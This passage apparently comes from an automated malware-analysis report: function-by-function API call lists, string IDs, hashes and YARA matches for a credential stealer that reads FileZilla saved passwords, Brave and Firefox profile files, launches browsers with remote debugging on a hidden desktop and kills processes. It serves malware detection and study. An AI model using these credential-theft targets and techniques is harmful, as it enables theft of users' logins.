                          • Instruction Fuzzy Hash: 61629171A106169BCB21AF79DD4CAEF77BAAF44305F04412AF805A3290DB78DD45CFA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004169C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00416A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00416A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00416AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00416B35
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416B9D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416BCD
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 2c508ab333171e5fa11f20666f870d2779ef429567be97f149c8f21ba4681bd9
                          • Instruction ID: c10cf898676c80c510ce13e0c370cb3e62b6153e8c8c123d5eee7de8961415cb
                          • Opcode Fuzzy Hash: 2c508ab333171e5fa11f20666f870d2779ef429567be97f149c8f21ba4681bd9
                          • Instruction Fuzzy Hash: 0F42C270B00215ABCB11ABB5DD89BEF777AAF04704F15542AF801E7291DBB8D941CFA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DBEF
                          • lstrlen.KERNEL32(00434CA8), ref: 0040DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC17
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 0040DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC4C
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DC8F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0040DCD0
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0040DCF0
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0040DD0A
                          • lstrlen.KERNEL32(0042CFEC), ref: 0040DD1D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DD7B
                          • lstrlen.KERNEL32(00431794), ref: 0040DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDA3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DDAF
                          • lstrlen.KERNEL32(?), ref: 0040DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0040DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DE19
                          • lstrlen.KERNEL32(00431794), ref: 0040DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DE6F
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DE7B
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DEBB
                          • lstrlen.KERNEL32(00431794), ref: 0040DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DEE6
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DEF2
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFA5
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DFB1
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DFF4
                          • lstrlen.KERNEL32(00431794), ref: 0040DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E022
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040E02E
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0040E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040E0E7
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E11F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0040E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E19F
                          • lstrcat.KERNEL32(00000000), ref: 0040E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0040E1F9
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E22F
                          • lstrlen.KERNEL32(00FB8B30), ref: 0040E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E261
                          • lstrcat.KERNEL32(00000000,00FB8B30), ref: 0040E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040E988
                          • FindClose.KERNEL32(00000000), ref: 0040E997
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 5db075929d16c61b5c53cc914961670529be8a7a5d4f5222b3d3c395255468e3
                          • Instruction ID: 2b9d354d71d61b3b1f17fedc15f500068f23a244b4b65c85bf41effa755d8327
                          • Opcode Fuzzy Hash: 5db075929d16c61b5c53cc914961670529be8a7a5d4f5222b3d3c395255468e3
                          • Instruction Fuzzy Hash: A4526E71A102069BCB21AFB9DD89AAF77B9AF44304F04553AF805B72D1DB78DC058FA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 004060FF
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406152
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406185
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004061B5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004061F0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406233
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 04ed63fa57fe1fae11b275a6349b84a243cbb9ace0e3be944a48824bcb749318
                          • Instruction ID: 27cd215b25e213956921f3ebe2cd48210a473c36f4205886a69a14d161a46670
                          • Opcode Fuzzy Hash: 04ed63fa57fe1fae11b275a6349b84a243cbb9ace0e3be944a48824bcb749318
                          • Instruction Fuzzy Hash: 7E526F71A002169BDB21ABB9DD48A9F77B9AF44304F15503AF806B72D1DB78DC05CFA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416B9D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416BCD
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416BFD
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00416C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00416C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00416C5A
                          • lstrlen.KERNEL32(00000000), ref: 00416C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00416CE2
                          • lstrlen.KERNEL32(00000000), ref: 00416CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00416D6A
                          • lstrlen.KERNEL32(00000000), ref: 00416D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00416DF2
                          • lstrlen.KERNEL32(00000000), ref: 00416E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00416E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00416EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00416EC9
                          • LocalFree.KERNEL32(00000000), ref: 00416ED4
                          • lstrlen.KERNEL32(?), ref: 00416F6E
                          • lstrlen.KERNEL32(?), ref: 00416F81
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: e9fea34015fb0c7d9f27d3fba072ce80c653791ad47483ec24c595c09895995e
                          • Instruction ID: 4aeb7553f5faa1c3fc6259bbd3118fa4e1f792876889c6ef11b00afc158b1bcd
                          • Opcode Fuzzy Hash: e9fea34015fb0c7d9f27d3fba072ce80c653791ad47483ec24c595c09895995e
                          • Instruction Fuzzy Hash: 4502A170B00215AFCB11ABB5DD8DA9F7B7AAF04704F15142AF805E7291DFB8D941CBA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414B7F
                          • lstrlen.KERNEL32(00434CA8), ref: 00414B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BA7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 00414BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00414BFA
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: 9f4765d053e3773a725a9bbcbcef2a92c3d3c3466fbb51977546b13449c9c511
                          • Instruction ID: 96128fc308192cafbb81789864f6749e9696443de39f29eb3bb614e824a23235
                          • Opcode Fuzzy Hash: 9f4765d053e3773a725a9bbcbcef2a92c3d3c3466fbb51977546b13449c9c511
                          • Instruction Fuzzy Hash: 57923270A01605CFDB25CF29D948BDAB7E5AF84314F1980AEE8099B3A1D779DC81CF94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00411291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004112BF
                          • lstrlen.KERNEL32(00434CA8), ref: 004112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112E7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 004112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0041133A
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041135C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00411376
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 004113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004113E2
                          • lstrlen.KERNEL32(00431794), ref: 004113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041140A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411416
                          • lstrlen.KERNEL32(?), ref: 00411423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411443
                          • lstrcat.KERNEL32(00000000,?), ref: 00411451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041147A
                          • StrCmpCA.SHLWAPI(?,00FBCF38), ref: 004114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 004114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411535
                          • StrCmpCA.SHLWAPI(?,00FBD868), ref: 00411552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411593
                          • lstrcpy.KERNEL32(00000000,?), ref: 004115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004115E4
                          • StrCmpCA.SHLWAPI(?,00FBCF68), ref: 00411602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411685
                          • StrCmpCA.SHLWAPI(?,00FBD028), ref: 004116B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 004116F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 004117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041181C
                          • FindClose.KERNEL32(00000000), ref: 0041182B
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: bea78667bade33136e360a4ef188ad232c2d3832278c2d27ff4b897d88a25793
                          • Instruction ID: 68930a77b454920cac28dd481b56dceb7b10e8baaefe5b7b669585f4eccf4a8a
                          • Opcode Fuzzy Hash: bea78667bade33136e360a4ef188ad232c2d3832278c2d27ff4b897d88a25793
                          • Instruction Fuzzy Hash: D1129370A102069BCB24EF79DD89AEF77B5AF44304F04452EF946A73A0DB78DC458B94
                          APIs
                          • wsprintfA.USER32 ref: 0041CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041CC13
                          • lstrcat.KERNEL32(?,?), ref: 0041CC5F
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041CC71
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041CC8B
                          • wsprintfA.USER32 ref: 0041CCB0
                          • PathMatchSpecA.SHLWAPI(?,00FB8AD0), ref: 0041CCE2
                          • CoInitialize.OLE32(00000000), ref: 0041CCEE
                            • Part of subcall function 0041CAE0: CoCreateInstance.COMBASE(0042B110,00000000,00000001,0042B100,?), ref: 0041CB06
                            • Part of subcall function 0041CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0041CB46
                            • Part of subcall function 0041CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0041CBC9
                          • CoUninitialize.COMBASE ref: 0041CD09
                          • lstrcat.KERNEL32(?,?), ref: 0041CD2E
                          • lstrlen.KERNEL32(?), ref: 0041CD3B
                          • StrCmpCA.SHLWAPI(?,0042CFEC), ref: 0041CD55
                          • wsprintfA.USER32 ref: 0041CD7D
                          • wsprintfA.USER32 ref: 0041CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0041CDB0
                          • wsprintfA.USER32 ref: 0041CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0041CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0041CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0041CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0041CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0041CF8D
                          • FindClose.KERNEL32(?), ref: 0041CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 762c265963974d8a3b5201397d5c00f5dbfbfa05dfd14c4931b4725b635083f4
                          • Instruction ID: f8520120a7f7ce95aea0cf0dc641d4b00008e37613aeed1fa22f9fd062c4b8f8
                          • Opcode Fuzzy Hash: 762c265963974d8a3b5201397d5c00f5dbfbfa05dfd14c4931b4725b635083f4
                          • Instruction Fuzzy Hash: F9C17371A003189FCB20DF64DC89AEE777AAF88304F144599F509A7290DF74AA85CFA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00411291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004112BF
                          • lstrlen.KERNEL32(00434CA8), ref: 004112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004112E7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 004112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0041133A
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041135C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00411376
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 004113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004113E2
                          • lstrlen.KERNEL32(00431794), ref: 004113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041140A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411416
                          • lstrlen.KERNEL32(?), ref: 00411423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411443
                          • lstrcat.KERNEL32(00000000,?), ref: 00411451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041147A
                          • StrCmpCA.SHLWAPI(?,00FBCF38), ref: 004114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 004114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411535
                          • StrCmpCA.SHLWAPI(?,00FBD868), ref: 00411552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411593
                          • lstrcpy.KERNEL32(00000000,?), ref: 004115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004115E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 004117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041181C
                          • FindClose.KERNEL32(00000000), ref: 0041182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 18778ca0182dff7fb4d93401d49f09d25fee920ab18524c459e30ff890c046a9
                          • Instruction ID: 99e12ac4dd193ae99830e339af0b4d11ad46e1dced0c46203470acebc7f531b4
                          • Opcode Fuzzy Hash: 18778ca0182dff7fb4d93401d49f09d25fee920ab18524c459e30ff890c046a9
                          • Instruction Fuzzy Hash: 4CC19371B102069BCB21EF79DD89AEF77B5AF04304F04102AF945A32A1DB78DC458FA4
                          APIs
                          • memset.MSVCRT ref: 00409790
                          • lstrcat.KERNEL32(?,?), ref: 004097A0
                          • lstrcat.KERNEL32(?,?), ref: 004097B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004097C3
                          • memset.MSVCRT ref: 004097D7
                            • Part of subcall function 00423E70: lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00423EA5
                            • Part of subcall function 00423E70: lstrcpy.KERNEL32(00000000,00FBA168), ref: 00423ECF
                            • Part of subcall function 00423E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0040134E,?,0000001A), ref: 00423ED9
                          • wsprintfA.USER32 ref: 00409806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409844
                            • Part of subcall function 004246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246B9
                            • Part of subcall function 004246A0: Process32First.KERNEL32(00000000,00000128), ref: 004246C9
                            • Part of subcall function 004246A0: Process32Next.KERNEL32(00000000,00000128), ref: 004246DB
                            • Part of subcall function 004246A0: StrCmpCA.SHLWAPI(?,?), ref: 004246ED
                            • Part of subcall function 004246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424702
                            • Part of subcall function 004246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00424711
                            • Part of subcall function 004246A0: CloseHandle.KERNEL32(00000000), ref: 00424718
                            • Part of subcall function 004246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00424726
                            • Part of subcall function 004246A0: CloseHandle.KERNEL32(00000000), ref: 00424731
                          • lstrcat.KERNEL32(00000000,?), ref: 00409878
                          • lstrcat.KERNEL32(00000000,?), ref: 00409889
                          • lstrcat.KERNEL32(00000000,00434B60), ref: 0040989B
                          • memset.MSVCRT ref: 004098AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004098D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00409903
                          • StrStrA.SHLWAPI(00000000,00FBDF78), ref: 00409919
                          • lstrcpyn.KERNEL32(006393D0,00000000,00000000), ref: 00409938
                          • lstrlen.KERNEL32(?), ref: 0040994B
                          • wsprintfA.USER32 ref: 0040995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00409971
                          • Sleep.KERNEL32(00001388), ref: 004099E7
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092E1
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092FA
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 00409399
                            • Part of subcall function 004092B0: strlen.MSVCRT ref: 004093E6
                            • Part of subcall function 00424740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424759
                            • Part of subcall function 00424740: Process32First.KERNEL32(00000000,00000128), ref: 00424769
                            • Part of subcall function 00424740: Process32Next.KERNEL32(00000000,00000128), ref: 0042477B
                            • Part of subcall function 00424740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0042479C
                            • Part of subcall function 00424740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004247AB
                            • Part of subcall function 00424740: CloseHandle.KERNEL32(00000000), ref: 004247B2
                            • Part of subcall function 00424740: Process32Next.KERNEL32(00000000,00000128), ref: 004247C0
                            • Part of subcall function 00424740: CloseHandle.KERNEL32(00000000), ref: 004247CB
                          • CloseDesktop.USER32(?), ref: 00409A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          • Opcode ID: 21a8a1b049b2d97fd293a175e3e67cf21be045f4bb3ce3a9570584b16c25cb89
                          • Instruction ID: 4b0e34de16c596f65eee158add2dad243c56dcf1612adfc997a4de13671dcc5d
                          • Opcode Fuzzy Hash: 21a8a1b049b2d97fd293a175e3e67cf21be045f4bb3ce3a9570584b16c25cb89
                          • Instruction Fuzzy Hash: 2D916171A10218AFDB10DF64DC89FDE77B9AF48700F1040A9F609A72D1DFB4AA448FA4
                          APIs
                          • wsprintfA.USER32 ref: 0041E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041E243
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041E263
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041E27D
                          • wsprintfA.USER32 ref: 0041E2A2
                          • StrCmpCA.SHLWAPI(?,0042CFEC), ref: 0041E2B4
                          • wsprintfA.USER32 ref: 0041E2D1
                            • Part of subcall function 0041EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0041EE12
                          • wsprintfA.USER32 ref: 0041E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0041E304
                          • lstrcat.KERNEL32(?,00FBE558), ref: 0041E335
                          • lstrcat.KERNEL32(?,00431794), ref: 0041E347
                          • lstrcat.KERNEL32(?,?), ref: 0041E358
                          • lstrcat.KERNEL32(?,00431794), ref: 0041E36A
                          • lstrcat.KERNEL32(?,?), ref: 0041E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0041E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E422
                          • DeleteFileA.KERNEL32(?), ref: 0041E45C
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041E49B
                          • FindClose.KERNEL32(00000000), ref: 0041E4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: 4a2eccff4615c3cd6f1c7582e7166ff7a4d4baf4555253d0c23705893c154f32
                          • Instruction ID: 0ebf8fa3b60a6a6c73fa557e706a9dc2010bfe5bc69f4f11cfc7a73c4dbc13c7
                          • Opcode Fuzzy Hash: 4a2eccff4615c3cd6f1c7582e7166ff7a4d4baf4555253d0c23705893c154f32
                          • Instruction Fuzzy Hash: B5819771A002189FCB20EF75DD49AEF7779BF44300F0455A9B90693191DF78AA44CFA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004016E2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040176C
                          • lstrcat.KERNEL32(00000000), ref: 00401776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004017A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 004018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004018FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: c4b74769114b713f627fa1af7ac0ecb7a329170a52fe1645dd556dd1b1344424
                          • Instruction ID: cd06a09a0fb4a9f553eb0f322cadc50c1285817f96e15c4172f0039c12c8fe68
